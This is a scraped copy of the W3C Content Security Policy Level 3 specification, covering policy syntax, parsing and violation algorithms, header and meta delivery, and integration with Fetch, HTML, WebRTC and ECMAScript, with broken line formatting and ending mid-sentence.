1. Introduction
This section is not normative.
This document defines Content Security Policy (CSP), a tool which developers can use to lock down their applications in various ways, mitigating the risk of content injection vulnerabilities such as cross-site scripting, and reducing the privilege with which their applications execute.
CSP is not intended as a first line of defense against content injection vulnerabilities. Instead, CSP is best used as defense-in-depth. It reduces the harm that a malicious injection can cause, but it is not a replacement for careful input validation and output encoding.
This document is an iteration on Content Security Policy Level 2, with the goal of more clearly explaining the interactions between CSP, HTML, and Fetch on the one hand, and providing clear hooks for modular extensibility on the other. Ideally, this will form a stable core upon which we can build new functionality.
1.1. Examples
1.1.1. Control Execution
Content-Security-Policy: script-src https://cdn.example.com/scripts/; object-src 'none'
1.2. Goals
Content Security Policy aims to do to a few related things:
-
Mitigate the risk of content-injection attacks by giving developers fairly granular control over
-
Mitigate the risk of attacks which require a resource to be embedded in a malicious context (the "Pixel Perfect" attack described in [TIMING] , for example) by giving developers granular control over the origins which can embed a given resource.
-
Provide a policy framework which allows developers to reduce the privilege of their applications.
-
Provide a reporting mechanism which allows developers to detect flaws being exploited in the wild.
1.3. Changes from Level 2
This document describes an evolution of the Content Security Policy Level 2 specification [CSP2] . The following is a high-level overview of the changes:
-
The specification has been rewritten from the ground up in terms of the [FETCH] specification, which should make it simpler to integrate CSP’s requirements and restrictions with other specifications (and with Service Workers in particular).
-
The
child-src
model has been substantially altered:-
The
frame-src
directive, which was deprecated in CSP Level 2, has been undeprecated, but continues to defer tochild-src
if not present (which defers todefault-src
in turn). -
A
worker-src
directive has been added, deferring tochild-src
if not present (which likewise defers toscript-src
and eventuallydefault-src
).
-
-
The URL matching algorithm now treats insecure schemes and ports as matching their secure variants. That is, the source expression
http://example.com:80
will match bothhttp://example.com:80
andhttps://example.com:443
.Likewise,
'self'
now matcheshttps:
andwss:
variants of the page’s origin, even on pages whose scheme ishttp
. -
Violation reports generated from inline script or style will now report "
inline
" as the blocked resource. Likewise, blockedeval()
execution will report "eval
" as the blocked resource. -
The
manifest-src
directive has been added. -
The
report-uri
directive is deprecated in favor of the newreport-to
directive, which relies on [REPORTING] as infrastructure. -
The
'strict-dynamic'
source expression will now allow script which executes on a page to load more script via non- "parser-inserted"script
elements. Details are in § 8.2 Usage of "'strict-dynamic'" . -
The
'unsafe-hashes'
source expression will now allow event handlers, style attributes andjavascript:
navigation targets to match hashes. Details in § 8.3 Usage of "'unsafe-hashes'" . -
The source expression matching has been changed to require explicit presence of any non- HTTP(S) scheme , rather than local scheme , unless that non- HTTP(S) scheme is the same as the scheme of protected resource, as described in § 6.7.2.8 Does url match expression in origin with redirect count? .
-
Hash-based source expressions may now match external scripts if the
script
element that triggers the request specifies a set of integrity metadata which is listed in the current policy. Details in § 8.4 Allowing external JavaScript via hashes . -
Reports generated for inline violations will contain a sample attribute if the relevant directive contains the
'report-sample'
expression.
2. Framework
2.1. Infrastructure
This
document
uses
ABNF
grammar
to
specify
syntax,
as
defined
in
[RFC5234]
.
It
also
relies
on
the
#rule
ABNF
extension
defined
in
Section
5.6.1
of
[RFC9110]
,
with
the
modification
that
OWS
is
replaced
with
optional-ascii-whitespace
.
That
is,
the
#rule
used
in
this
document
is
defined
as:
1#element => element *( optional-ascii-whitespace "," optional-ascii-whitespace element )
and for n >= 1 and m > 1:
<n>#<m>element => element <n-1>*<m-1>( optional-ascii-whitespace "," optional-ascii-whitespace element )
This document depends on the Infra Standard for a number of foundational concepts used in its algorithms and prose [INFRA] .
The following definitions are used to improve readability of other definitions in this document.
optional-ascii-whitespace = *( %x09 / %x0A / %x0C / %x0D / %x20 ) required-ascii-whitespace = 1*( %x09 / %x0A / %x0C / %x0D / %x20 ) ; These productions match the definition of ASCII whitespace from the INFRA standard.
2.2. Policies
A
policy
defines
allowed
and
restricted
behaviors,
and
may
be
applied
to
a
Document
,
WorkerGlobalScope
,
or
WorkletGlobalScope
.
Each policy has an associated directive set , which is an ordered set of directives that define the policy’s implications when applied.
Each
policy
has
an
associated
disposition
,
which
is
either
"
enforce
"
or
"
report
".
Each
policy
has
an
associated
source
,
which
is
either
"
header
"
or
"
meta
".
Each
policy
has
an
associated
self-origin
,
which
is
an
origin
that
is
used
when
matching
the
'self'
keyword.
Note:
This
is
needed
to
facilitate
the
'self'
checks
of
local
scheme
documents/workers
that
have
inherited
their
policy
but
have
an
opaque
origin
.
Most
of
the
time
this
will
simply
be
the
environment
settings
object
’s
origin
.
Multiple policies can be applied to a single resource, and are collected into a list of policies known as a CSP list .
A
CSP
list
contains
a
header-delivered
Content
Security
Policy
if
it
contains
a
policy
whose
source
is
"
header
".
A serialized CSP is an ASCII string consisting of a semicolon-delimited series of serialized directives , adhering to the following ABNF grammar [RFC5234] :
serialized-policy = serialized-directive *( optional-ascii-whitespace ";" [ optional-ascii-whitespace serialized-directive ] )
A serialized CSP list is an ASCII string consisting of a comma-delimited series of serialized CSPs , adhering to the following ABNF grammar [RFC5234] :
serialized-policy-list = 1#serialized-policy ; The '#' rule is the one defined in section 5.6.1 of RFC 9110 ; but it incorporates the modifications specified ; in section 2.1 of this document.
2.2.1. Parse a serialized CSP
To parse a serialized CSP , given a byte sequence or string serialized , a source source , and a disposition disposition , execute the following steps.
This algorithm returns a Content Security Policy object . If serialized could not be parsed, the object’s directive set will be empty.
-
If serialized is a byte sequence , then set serialized to be the result of isomorphic decoding serialized .
-
Let policy be a new policy with an empty directive set , a source of source , and a disposition of disposition .
-
For each token returned by strictly splitting serialized on the U+003B SEMICOLON character (
;
):-
Strip leading and trailing ASCII whitespace from token .
-
If token is an empty string, or if token is not an ASCII string , continue .
-
Let directive name be the result of collecting a sequence of code points from token which are not ASCII whitespace .
-
Set directive name to be the result of running ASCII lowercase on directive name .
Note: Directive names are case-insensitive, that is:
script-SRC 'none'
andScRiPt-sRc 'none'
are equivalent. -
If policy ’s directive set contains a directive whose name is directive name , continue .
Note: In this case, the user agent SHOULD notify developers that a duplicate directive was ignored. A console warning might be appropriate, for example.
-
Let directive value be the result of splitting token on ASCII whitespace .
-
Let directive be a new directive whose name is directive name , and value is directive value .
-
Append directive to policy ’s directive set .
-
-
Return policy .
2.2.2. Parse response ’s Content Security Policies
To parse a response’s Content Security Policies given a response response , execute the following steps.
This algorithm returns a list of Content Security Policy objects . If the policies cannot be parsed, the returned list will be empty.
-
Let policies be an empty list .
-
For each token returned by extracting header list values given
Content-Security-Policy
and response ’s header list :-
Let policy be the result of parsing token , with a source of "
header
", and a disposition of "enforce
". -
If policy ’s directive set is not empty, append policy to policies .
-
-
For each token returned by extracting header list values given
Content-Security-Policy-Report-Only
and response ’s header list :-
Let policy be the result of parsing token , with a source of "
header
", and a disposition of "report
". -
If policy ’s directive set is not empty, append policy to policies .
-
-
For each policy of policies :
-
Set policy ’s self-origin to response ’s url ’s origin .
-
-
Return policies .
Note: When parsing a response’s Content Security Policies , if the resulting policies end up containing at least one item, user agents can hold a flag on policies and use it to optimize away the contains a header-delivered Content Security Policy algorithm.
2.3. Directives
Each policy contains an ordered set of directives (its directive set ), each of which controls a specific behavior. The directives defined in this document are described in detail in § 6 Content Security Policy Directives .
Each directive is a name / value pair. The name is a non-empty string , and the value is a set of non-empty strings . The value MAY be empty .
A serialized directive is an ASCII string , consisting of one or more whitespace-delimited tokens, and adhering to the following ABNF [RFC5234] :
serialized-directive = directive-name [ required-ascii-whitespace directive-value ] directive-name = 1*( ALPHA / DIGIT / "-" ) directive-value = *( required-ascii-whitespace / ( %x21-%x2B / %x2D-%x3A / %x3C-%x7E ) ) ; Directive values may contain whitespace and VCHAR characters, ; excluding ";" and ",". The second half of the definition ; above represents all VCHAR characters (%x21-%x7E) ; without ";" and "," (%x3B and %x2C respectively) ; ALPHA, DIGIT, and VCHAR are defined in Appendix B.1 of RFC 5234.
Directives have a number of associated algorithms:
-
A pre-request check , which takes a request and a policy as an argument, and is executed during § 4.1.2 Should request be blocked by Content Security Policy? . This algorithm returns "
Allowed
" unless otherwise specified. -
A post-request check , which takes a request , a response , and a policy as arguments, and is executed during § 4.1.3 Should response to request be blocked by Content Security Policy? . This algorithm returns "
Allowed
" unless otherwise specified. -
An inline check , which takes an
Element
, a type string, a policy , and a source string as arguments, and is executed during § 4.2.3 Should element’s inline type behavior be blocked by Content Security Policy? and during § 4.2.4 Should navigation request of type be blocked by Content Security Policy? forjavascript:
requests. This algorithm returns "Allowed
" unless otherwise specified. -
An initialization , which takes a
Document
or global object and a policy as arguments. This algorithm is executed during § 4.2.1 Run CSP initialization for a Document and § 4.2.6 Run CSP initialization for a global object . Unless otherwise specified, it has no effect and it returns "Allowed
". -
A pre-navigation check , which takes a request , a navigation type string ("
form-submission
" or "other
"), and a policy as arguments, and is executed during § 4.2.4 Should navigation request of type be blocked by Content Security Policy? . It returns "Allowed
" unless otherwise specified. -
A navigation response check , which takes a request , a navigation type string ("
form-submission
" or "other
"), a response , a navigable , a check type string ("source
" or "response
"), and a policy as arguments, and is executed during § 4.2.5 Should navigation response to navigation request of type in target be blocked by Content Security Policy? . It returns "Allowed
" unless otherwise specified. -
A webrtc pre-connect check , which takes a policy , and is executed during § 4.3.1 Should RTC connections be blocked for global? . It returns "
Allowed
" unless otherwise specified.
2.3.1. Source Lists
Many directives ' value consist of source lists : sets of strings which identify content that can be fetched and potentially embedded or executed. Each string represents one of the following types of source expression :
-
Keywords such as
'none'
and'self'
(which match nothing and the current URL’s origin, respectively) -
Serialized URLs such as
https://example.com/path/to/file.js
(which matches a specific file) orhttps://example.com/
(which matches everything on that origin) -
Schemes such as
https:
(which matches any resource having the specified scheme) -
Hosts such as
example.com
(which matches any resource on the host, regardless of scheme) or*.example.com
(which matches any resource on the host’s subdomains (and any of its subdomains' subdomains, and so on)) -
Nonces such as
'nonce-ch4hvvbHDpv7xCSvXCs3BrNggHdTzxUA'
(which can match specific elements on a page) -
Digests such as
'sha256-abcd...'
(which can match specific elements on a page)
A serialized source list is an ASCII string , consisting of a whitespace-delimited series of source expressions , adhering to the following ABNF grammar [RFC5234] :
serialized-source-list = ( source-expression *( required-ascii-whitespace source-expression ) ) / "'none'"
source-expression = scheme-source / host-source / keyword-source
/ nonce-source / hash-source
; Schemes: "https:" / "custom-scheme:" / "another.custom-scheme:"
scheme-source = scheme-part ":"
; Hosts: "example.com" / "*.example.com" / "https://*.example.com:12/path/to/file.js"
host-source = [ scheme-part "://" ] host-part [ ":" port-part ] [ path-part ]
scheme-part = scheme
; scheme is defined in section 3.1 of RFC 3986.
host-part = "*" / [ "*." ] 1*host-char *( "." 1*host-char ) [ "." ]
host-char = ALPHA / DIGIT / "-"
port-part = 1*DIGIT / "*"
path-part = path-absolute (but not including ";" or ",")
; path-absolute is defined in section 3.3 of RFC 3986.
; Keywords:
keyword-source = "'self'" / "'unsafe-inline'" / "'unsafe-eval'"
/ "'strict-dynamic'" / "'unsafe-hashes'"
/ "'report-sample'" / "'unsafe-allow-redirects'"
/ "'wasm-unsafe-eval'" / "'trusted-types-eval'"
/ "'report-sha256'" / "'report-sha384'"
/ "'report-sha512'"
ISSUE: Bikeshed unsafe-allow-redirects
.
; Nonces: 'nonce-[nonce goes here]'
nonce-source = "'nonce-" base64-value "'"
base64-value = 1*( ALPHA / DIGIT / "+" / "/" / "-" / "_" )*2( "=" )
; Digests: 'sha256-[digest goes here]'
hash-source = "'" hash-algorithm "-" base64-value "'"
hash-algorithm = "sha256" / "sha384" / "sha512"
The
host-char
production
intentionally
contains
only
ASCII
characters;
internationalized
domain
names
cannot
be
entered
directly
as
part
of
a
serialized
CSP
,
but
instead
MUST
be
Punycode-encoded
[RFC3492]
.
For
example,
the
domain
üüüüüü.de
MUST
be
represented
as
xn--tdaaaaaa.de
.
Note:
Though
IP
address
do
match
the
grammar
above,
only
127.0.0.1
will
actually
match
a
URL
when
used
in
a
source
expression
(see
§ 6.7.2.7
Does
url
match
source
list
in
origin
with
redirect
count?
for
details).
The
security
properties
of
IP
addresses
are
suspect,
and
authors
ought
to
prefer
hostnames
whenever
possible.
Note: The base64-value grammar allows both base64 and base64url encoding. These encodings are treated as equivalant when processing hash-source values. Nonces, however, are strict string matches: we use the base64-value grammar to limit the characters available, and reduce the complexity for the server-side operator (encodings, etc), but the user agent doesn’t actually care about any underlying value, nor does it do any decoding of the nonce-source value.
2.4. Violations
A violation represents an action or resource which goes against the set of policy objects associated with a global object .
Each violation has a global object , which is the global object whose policy has been violated.
Each
violation
has
a
url
which
is
its
global
object
’s
URL
.
Each violation has a status which is a non-negative integer representing the HTTP status code of the resource for which the global object was instantiated.
Each
violation
has
a
resource
,
which
is
either
null,
"
inline
",
"
eval
",
"
wasm-eval
",
"
trusted-types-policy
",
"
trusted-types-sink
"
or
a
URL
.
It
represents
the
resource
which
violated
the
policy.
Note:
The
value
null
for
a
violation
’s
resource
is
only
allowed
while
the
violation
is
being
populated.
By
the
time
the
violation
is
reported
and
its
resource
is
used
for
obtaining
the
blocked
URI
,
the
violation
’s
resource
should
be
populated
with
a
URL
or
one
of
the
allowed
strings.
Each
violation
has
a
referrer
,
which
is
either
null,
or
a
URL
.
It
represents
the
referrer
of
the
resource
whose
policy
was
violated.
Each violation has a policy , which is the policy that has been violated.
Each violation has a disposition , which is the disposition of the policy that has been violated.
Each violation has an effective directive which is a non-empty string representing the directive whose enforcement caused the violation.
Each
violation
has
a
source
file
,
which
is
either
null
or
a
URL
.
Each violation has a line number , which is a non-negative integer.
Each violation has a column number , which is a non-negative integer.
Each violation has a element , which is either null or an element.
Each violation has a sample , which is a string. It is the empty string unless otherwise specified.
Note: A violation ’s sample will be populated with the first 40 characters of an inline script, event handler, or style that caused an violation. Violations which stem from an external file will not include a sample in the violation report.
2.4.1. Create a violation object for global , policy , and directive
Given a global object global , a policy policy , and a string directive , the following algorithm creates a new violation object, and populates it with an initial set of data:
-
Let violation be a new violation whose global object is global , policy is policy , effective directive is directive , and resource is null.
-
If the user agent is currently executing script, and can extract a source file’s URL, line number, and column number from the global , set violation ’s source file , line number , and column number accordingly.
Is this kind of thing specified anywhere? I didn’t see anything that looked useful in [ECMA262] .
Note: User agents need to ensure that the source file is the URL requested by the page, pre-redirects. If that’s not possible, user agents need to strip the URL down to an origin to avoid unintentional leakage.
-
If global is a
Window
object, set violation ’s referrer to global ’s document ’sreferrer
. -
Set violation ’s status to the HTTP status code for the resource associated with violation ’s global object .
How, exactly, do we get the status code? We don’t actually store it anywhere.
-
Return violation .
2.4.2. Create a violation object for request , and policy .
Given a request request , a policy policy , the following algorithm creates a new violation object, and populates it with an initial set of data:
-
Let directive be the result of executing § 6.8.1 Get the effective directive for request on request .
-
Let violation be the result of executing § 2.4.1 Create a violation object for global, policy, and directive on request ’s client ’s global object , policy , and directive .
-
Set violation ’s resource to request ’s url .
Note: We use request ’s url , and not its current url , as the latter might contain information about redirect targets to which the page MUST NOT be given access.
-
Return violation .
3. Policy Delivery
A server MAY declare a policy for a particular resource representation via an HTTP response header field whose value is a serialized CSP . This mechanism is defined in detail in § 3.1 The Content-Security-Policy HTTP Response Header Field and § 3.2 The Content-Security-Policy-Report-Only HTTP Response Header Field , and the integration with Fetch and HTML is described in § 4.1 Integration with Fetch and § 4.2 Integration with HTML .
A
policy
may
also
be
declared
inline
in
an
HTML
document
via
a
meta
element’s
http-equiv
attribute,
as
described
in
§ 3.3
The
<meta>
element
.
3.1.
The
Content-Security-Policy
HTTP
Response
Header
Field
The
Content-Security-Policy
HTTP
response
header
field
is
the
preferred
mechanism
for
delivering
a
policy
from
a
server
to
a
client.
The
header’s
value
is
represented
by
the
following
ABNF
[RFC5234]
:
Content-Security-Policy = 1#serialized-policy ; The '#' rule is the one defined in section 5.6.1 of RFC 9110 ; but it incorporates the modifications specified ; in section 2.1 of this document.
Content-Security-Policy: script-src 'self'; report-to csp-reporting-endpoint
A
server
MAY
send
different
Content-Security-Policy
header
field
values
with
different
representations
of
the
same
resource.
When
the
user
agent
receives
a
Content-Security-Policy
header
field,
it
MUST
parse
and
enforce
each
serialized
CSP
it
contains
as
described
in
§ 4.1
Integration
with
Fetch
,
§ 4.2
Integration
with
HTML
.
3.2.
The
Content-Security-Policy-Report-Only
HTTP
Response
Header
Field
The
Content-Security-Policy-Report-Only
HTTP
response
header
field
allows
web
developers
to
experiment
with
policies
by
monitoring
(but
not
enforcing)
their
effects.
The
header’s
value
is
represented
by
the
following
ABNF
[RFC5234]
:
Content-Security-Policy-Report-Only = 1#serialized-policy ; The '#' rule is the one defined in section 5.6.1 of RFC 9110 ; but it incorporates the modifications specified ; in section 2.1 of this document.
This header field allows developers to piece together their security policy in an iterative fashion, deploying a report-only policy based on their best estimate of how their site behaves, watching for violation reports, and then moving to an enforced policy once they’ve gained confidence in that behavior.
Content-Security-Policy-Report-Only: script-src 'self'; report-to csp-reporting-endpoint
A
server
MAY
send
different
Content-Security-Policy-Report-Only
header
field
values
with
different
representations
of
the
same
resource.
When
the
user
agent
receives
a
Content-Security-Policy-Report-Only
header
field,
it
MUST
parse
and
monitor
each
serialized
CSP
it
contains
as
described
in
§ 4.1
Integration
with
Fetch
and
§ 4.2
Integration
with
HTML
.
Note:
The
Content-Security-Policy-Report-Only
header
is
not
supported
inside
a
meta
element.
3.3.
The
<meta>
element
A
Document
may
deliver
a
policy
via
one
or
more
HTML
meta
elements
whose
http-equiv
attributes
are
an
ASCII
case-insensitive
match
for
the
string
"
Content-Security-Policy
".
For
example:
Implementation
details
can
be
found
in
HTML’s
Content
Security
Policy
state
http-equiv
processing
instructions
[HTML]
.
Note:
The
Content-Security-Policy-Report-Only
header
is
not
supported
inside
a
meta
element.
Neither
are
the
report-uri
,
frame-ancestors
,
and
sandbox
directives.
Authors
are
strongly
encouraged
to
place
meta
elements
as
early
in
the
document
as
possible,
because
policies
in
meta
elements
are
not
applied
to
content
which
precedes
them.
In
particular,
note
that
resources
fetched
or
prefetched
using
the
Link
HTTP
response
header
field,
and
resources
fetched
or
prefetched
using
link
and
script
elements
which
precede
a
meta
-delivered
policy
will
not
be
blocked.
Note:
A
policy
specified
via
a
meta
element
will
be
enforced
along
with
any
other
policies
active
for
the
protected
resource,
regardless
of
where
they’re
specified.
The
general
impact
of
enforcing
multiple
policies
is
described
in
§ 8.1
The
effect
of
multiple
policies
.
Note:
Modifications
to
the
content
attribute
of
a
meta
element
after
the
element
has
been
parsed
will
be
ignored.
4. Integrations
This section is non-normative.
This document defines a set of algorithms which are used in other specifications in order to implement the functionality. These integrations are outlined here for clarity, but those external documents are the normative references which ought to be consulted for detailed information.
4.1. Integration with Fetch
A number of directives control resource loading in one way or another. This specification provides algorithms which allow Fetch to make decisions about whether or not a particular request should be blocked or allowed, and about whether a particular response should be replaced with a network error .
-
§ 4.1.2 Should request be blocked by Content Security Policy? is called as part of step 2.4 of the Main Fetch algorithm. This allows directives' pre-request checks to be executed against each request before it hits the network, and against each redirect that a request might go through on its way to reaching a resource.
-
§ 4.1.3 Should response to request be blocked by Content Security Policy? is called as part of step 11 of the Main Fetch algorithm. This allows directives' post-request checks to be executed on the response delivered from the network or from a Service Worker.
4.1.1. Report Content Security Policy violations for request
Given a request request , this algorithm reports violations based on policy container ’s CSP list "report only" policies.
-
Let CSP list be request ’s policy container ’s CSP list .
-
For each policy of CSP list :
-
If policy ’s disposition is "
enforce
", then skip to the next policy . -
Let violates be the result of executing § 6.7.2.1 Does request violate policy? on request and policy .
-
If violates is not "
Does Not Violate
", then execute § 5.5 Report a violation on the result of executing § 2.4.2 Create a violation object for request, and policy. on request , and policy .
-
4.1.2. Should request be blocked by Content Security Policy?
Given
a
request
request
,
this
algorithm
returns
Blocked
or
Allowed
and
reports
violations
based
on
request
’s
policy
container
’s
CSP
list
.
-
Let CSP list be request ’s policy container ’s CSP list .
-
Let result be "
Allowed
". -
For each policy of CSP list :
-
If policy ’s disposition is "
report
", then skip to the next policy . -
Let violates be the result of executing § 6.7.2.1 Does request violate policy? on request and policy .
-
If violates is not "
Does Not Violate
", then:-
Execute § 5.5 Report a violation on the result of executing § 2.4.2 Create a violation object for request, and policy. on request , and policy .
-
Set result to "
Blocked
".
-
-
-
Return result .
4.1.3. Should response to request be blocked by Content Security Policy?
Given
a
response
response
and
a
request
request
,
this
algorithm
returns
Blocked
or
Allowed
,
and
reports
violations
based
on
request
’s
policy
container
’s
CSP
list
.
-
Let CSP list be request ’s policy container ’s CSP list .
-
Let result be "
Allowed
". -
For each policy of CSP list :
-
For each directive of policy :
-
If the result of executing directive ’s post-request check is "
Blocked
", then:-
Execute § 5.5 Report a violation on the result of executing § 2.4.2 Create a violation object for request, and policy. on request , and policy .
-
If policy ’s disposition is "
enforce
", then set result to "Blocked
".
-
-
Note: This portion of the check verifies that the page can load the response. That is, that a Service Worker hasn’t substituted a file which would violate the page’s CSP.
-
-
Return result .
4.1.4. Potentially report hash
Given a response response , a request request , a directive directive and a content security policy object policy , run the following steps:
-
Let algorithm be the empty string .
-
If directive ’s value contains the expression "
'report-sha256'
", set algorithm to "sha256". -
If directive ’s value contains the expression "
'report-sha384'
", set algorithm to "sha384". -
If directive ’s value contains the expression "
'report-sha512'
", set algorithm to "sha512". -
If algorithm is the empty string , return.
-
Let hash be the empty string .
-
If response is CORS-same-origin , then:
-
Let h be the result of applying algorithm to bytes on response ’s body and algorithm .
-
Let hash be the concatenation of algorithm , U+2D (-), and h .
-
-
Let global be the request ’s client ’s global object .
-
If global is not a
Window
, return. -
Let stripped document URL to be the result of executing § 5.4 Strip URL for use in reports on global ’s document ’s URL .
-
If policy ’s directive set does not contain a directive named "report-to", return.
-
Let report-to directive be a directive named "report-to" from policy ’s directive set .
-
Let body be a csp hash report body with stripped document URL as its documentURL , request ’s URL as its subresourceURL , hash as its hash , request ’s destination as its destination , and "subresource" as its type .
-
Generate and queue a report with the following arguments:
- context
-
settings object
- type
-
"csp-hash"
- destination
-
report-to directive ’s value .
- data
-
body
4.2. Integration with HTML
-
The policy container has a CSP list , which holds all the policy objects which are active for a given context. This list is empty unless otherwise specified, and is populated from the response by parsing response ’s Content Security Policies or inherited following the rules of the policy container .
-
A global object ’s CSP list is the result of executing § 4.2.2 Retrieve the CSP list of an object with the global object as the
object
. -
A policy is enforced or monitored for a global object by inserting it into the global object ’s CSP list .
-
§ 4.2.1 Run CSP initialization for a Document is called during the create and initialize a new
Document
object algorithm. -
§ 4.2.3 Should element’s inline type behavior be blocked by Content Security Policy? is called during the prepare the script element and update a
style
block algorithms in order to determine whether or not an inline script or style block is allowed to execute/render. -
§ 4.2.3 Should element’s inline type behavior be blocked by Content Security Policy? is called during handling of inline event handlers (like
onclick
) and inlinestyle
attributes in order to determine whether or not they ought to be allowed to execute/render. -
policy is enforced during processing of the
meta
element’shttp-equiv
. -
HTML populates each request ’s cryptographic nonce metadata and parser metadata with relevant data from the elements responsible for resource loading.
Stylesheet loading is not yet integrated with Fetch in WHATWG’s HTML. [whatwg/html Issue #968]
-
§ 6.3.1.1 Is base allowed for document? is called during
base
’s set the frozen base URL algorithm to ensure that thehref
attribute’s value is valid. -
§ 4.2.4 Should navigation request of type be blocked by Content Security Policy? is called during the create navigation params by fetching algorithm, and § 4.2.5 Should navigation response to navigation request of type in target be blocked by Content Security Policy? is called during the attempt to populate the history entry’s document algorithm to apply directive’s navigation checks, as well as inline checks for navigations to
javascript:
URLs. -
§ 4.2.6 Run CSP initialization for a global object is called during the run a worker algorithm.
-
The sandbox directive is used to populate the CSP-derived sandboxing flags .
4.2.1.
Run
CSP
initialization
for
a
Document
Given
a
Document
document
,
the
user
agent
performs
the
following
steps
in
order
to
initialize
CSP
for
document
:
-
For each policy of document ’s policy container ’s CSP list :
-
For each directive of policy :
-
Execute directive ’s initialization algorithm on document , and assert: its returned value is "
Allowed
".
-
-
4.2.2. Retrieve the CSP list of an object
To obtain object ’s CSP list :
-
If object is a
Document
return object ’s policy container ’s CSP list . -
If object is a
Window
or aWorkerGlobalScope
or aWorkletGlobalScope
, return environment settings object ’s policy container ’s CSP list . -
Return null.
4.2.3. Should element ’s inline type behavior be blocked by Content Security Policy?
Given
an
Element
element
,
a
string
type
,
and
a
string
source
this
algorithm
returns
"
Allowed
"
if
the
element
is
allowed
to
have
inline
definition
of
a
particular
type
of
behavior
(script
execution,
style
application,
event
handlers,
etc.),
and
"
Blocked
"
otherwise:
Note:
The
valid
values
for
type
are
"
script
",
"
script
attribute
",
"
style
",
and
"
style
attribute
".
-
Assert: element is not null.
-
Let result be "
Allowed
". -
For each policy of element ’s
Document
’s global object ’s CSP list :-
For each directive of policy ’s directive set :
-
If directive ’s inline check returns "
Allowed
" when executed upon element , type , policy and source , skip to the next directive . -
Let directive-name be the result of executing § 6.8.2 Get the effective directive for inline checks on type .
-
Otherwise, let violation be the result of executing § 2.4.1 Create a violation object for global, policy, and directive on the current settings object ’s global object , policy , and directive-name .
-
Set violation ’s resource to "
inline
". -
Set violation ’s element to element .
-
If directive ’s value contains the expression "
'report-sample'
", then set violation ’s sample to the substring of source containing its first 40 characters. -
Execute § 5.5 Report a violation on violation .
-
If policy ’s disposition is "
enforce
", then set result to "Blocked
".
-
-
-
Return result .
4.2.4. Should navigation request of type be blocked by Content Security Policy?
Given
a
request
navigation
request
and
a
string
type
(either
"
form-submission
"
or
"
other
"),
this
algorithm
return
"
Blocked
"
if
the
active
policy
blocks
the
navigation,
and
"
Allowed
"
otherwise:
-
Let result be "
Allowed
". -
For each policy of navigation request ’s policy container ’s CSP list :
-
For each directive of policy :
-
If directive ’s pre-navigation check returns "
Allowed
" when executed upon navigation request , type , and policy skip to the next directive . -
Otherwise, let violation be the result of executing § 2.4.1 Create a violation object for global, policy, and directive on navigation request ’s client ’s global object , policy , and directive ’s name .
-
Execute § 5.5 Report a violation on violation .
-
If policy ’s disposition is "
enforce
", then set result to "Blocked
".
-
-
-
If result is "
Allowed
", and if navigation request ’s current URL ’s scheme isjavascript
:-
For each policy of navigation request ’s policy container ’s CSP list :
-
For each directive of policy :
-
Let directive-name be the result of executing § 6.8.2 Get the effective directive for inline checks on "
navigation
". -
If directive ’s inline check returns "
Allowed
" when executed upon null, "navigation
" and navigation request ’s current URL , skip to the next directive . -
Otherwise, let violation be the result of executing § 2.4.1 Create a violation object for global, policy, and directive on navigation request ’s client ’s global object , policy , and directive-name .
-
Set violation ’s resource to "
inline
". -
Execute § 5.5 Report a violation on violation .
-
If policy ’s disposition is "
enforce
", then set result to "Blocked
".
-
-
-
-
Return result .
4.2.5. Should navigation response to navigation request of type in target be blocked by Content Security Policy?
Given
a
request
navigation
request
,
a
response
navigation
response
,
a
CSP
list
response
CSP
list
,
a
string
type
(either
"
form-submission
"
or
"
other
"),
and
a
navigable
target
,
this
algorithm
returns
"
Blocked
"
if
the
active
policy
blocks
the
navigation,
and
"
Allowed
"
otherwise:
-
Let result be "
Allowed
". -
For each policy of response CSP list :
Note: Some directives (like frame-ancestors ) allow a response ’s Content Security Policy to act on the navigation.
-
For each directive of policy :
-
If directive ’s navigation response check returns "
Allowed
" when executed upon navigation request , type , navigation response , target , "response
", and policy skip to the next directive . -
Otherwise, let violation be the result of executing § 2.4.1 Create a violation object for global, policy, and directive on null, policy , and directive ’s name .
Note: We use null for the global object, as no global exists: we haven’t processed the navigation to create a Document yet.
-
Execute § 5.5 Report a violation on violation .
-
If policy ’s disposition is "
enforce
", then set result to "Blocked
".
-
-
-
For each policy of navigation request ’s policy container ’s CSP list :
Note: Some directives in the navigation request ’s context (like frame-ancestors ) need the response before acting on the navigation.
-
For each directive of policy :
-
If directive ’s navigation response check returns "
Allowed
" when executed upon navigation request , type , navigation response , target , "source
", and policy skip to the next directive . -
Otherwise, let violation be the result of executing § 2.4.1 Create a violation object for global, policy, and directive on navigation request ’s client ’s global object , policy , and directive ’s name .
-
Execute § 5.5 Report a violation on violation .
-
If policy ’s disposition is "
enforce
", then set result to "Blocked
".
-
-
-
Return result .
4.2.6.
Run
CSP
initialization
for
a
global
object
Given
a
global
object
global
,
the
user
agent
performs
the
following
steps
in
order
to
initialize
CSP
for
global
.
This
algorithm
returns
"
Allowed
"
if
global
is
allowed,
and
"
Blocked
"
otherwise:
-
Let result be "
Allowed
". -
For each policy of global ’s CSP list :
-
For each directive of policy :
-
Execute directive ’s initialization algorithm on global . If its returned value is "
Blocked
", then set result to "Blocked
".
-
-
-
Return result .
4.3. Integration with WebRTC
The
administratively-prohibited
algorithm
calls
§ 4.3.1
Should
RTC
connections
be
blocked
for
global?
when
invoked,
and
prohibits
all
candidates
if
it
returns
"
Blocked
".
4.3.1. Should RTC connections be blocked for global ?
Given
a
global
object
global
,
this
algorithm
returns
"
Blocked
"
if
the
active
policy
for
global
blocks
RTC
connections,
and
"
Allowed
"
otherwise:
-
Let result be "
Allowed
". -
For each policy of global ’s CSP list :
-
For each directive of policy :
-
If directive ’s webrtc pre-connect check returns "
Allowed
", continue . -
Otherwise, let violation be the result of executing § 2.4.1 Create a violation object for global, policy, and directive on global , policy , and directive ’s name .
-
Set violation ’s resource to null.
-
Execute § 5.5 Report a violation on violation .
-
If policy ’s disposition is "
enforce
", then set result to "Blocked
".
-
-
-
Return result .
4.4. Integration with ECMAScript
ECMAScript
defines
a
HostEnsureCanCompileStrings()
abstract
operation
which
allows
the
host
environment
to
block
the
compilation
of
strings
into
ECMAScript
code.
This
document
defines
an
implementation
of
that
abstract
operation
which
examines
the
relevant
CSP
list
to
determine
whether
such
compilation
ought
to
be
blocked.
4.4.1. EnsureCSPDoesNotBlockStringCompilation( realm , parameterStrings , bodyString , codeString , compilationType , parameterArgs , bodyArg )
Given
a
realm
realm
,
a
list
of
strings
parameterStrings
,
a
string
bodyString
,
a
string
codeString
,
an
enum
(
compilationType
),
a
list
of
ECMAScript
language
values
(
parameterArgs
),
and
an
ECMAScript
language
value
(
bodyArg
),
this
algorithm
returns
normally
if
string
compilation
is
allowed,
and
throws
an
